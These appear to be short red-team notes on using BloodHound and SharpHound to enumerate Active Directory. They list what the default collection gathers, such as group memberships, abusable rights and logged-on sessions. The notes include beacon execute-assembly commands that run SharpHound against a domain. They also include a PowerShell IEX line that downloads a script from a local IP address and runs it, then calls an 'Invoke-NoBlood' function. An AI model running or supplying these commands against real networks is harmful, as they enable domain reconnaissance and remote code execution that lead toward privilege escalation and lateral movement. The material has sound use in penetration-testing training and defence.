BloodHound
https://github.com/BloodHoundAD/BloodHound
C:\Tools\neo4j\bin\neo4j.bat console
C:\Tools\BloodHound\BloodHound.exe
SharpHound will automatically determine what domain your current user belongs to, find a domain controller for that domain, and start the “default” collection method. The default collection method will collect the following pieces of information from the domain controller:
Security group memberships
Domain trusts
Abusable rights on Active Directory objects
Group Policy links
OU tree structure
Several properties from computer, group and user objects
SQL admin links
Additionally, SharpHound will attempt to collect the following information from each domain-joined Windows computer:
The members of the local administrators, remote desktop, distributed COM, and remote management groups
Active sessions, which SharpHound will attempt to correlate to systems where users are interactively logged on
beacon> execute-assembly C:\Tools\SharpHound3\SharpHound3\bin\Debug\SharpHound.exe
beacon> execute-assembly C:\Tools\SharpHound3\SharpHound3\bin\Debug\SharpHound.exe -c DcOnly -d cyberbotic.io
PowerShell
IEX (New-Object Net.WebClient).DownloadString('http://192.168.80.128:80/sharp.ps1');
Invoke-NoBlood;
Last updated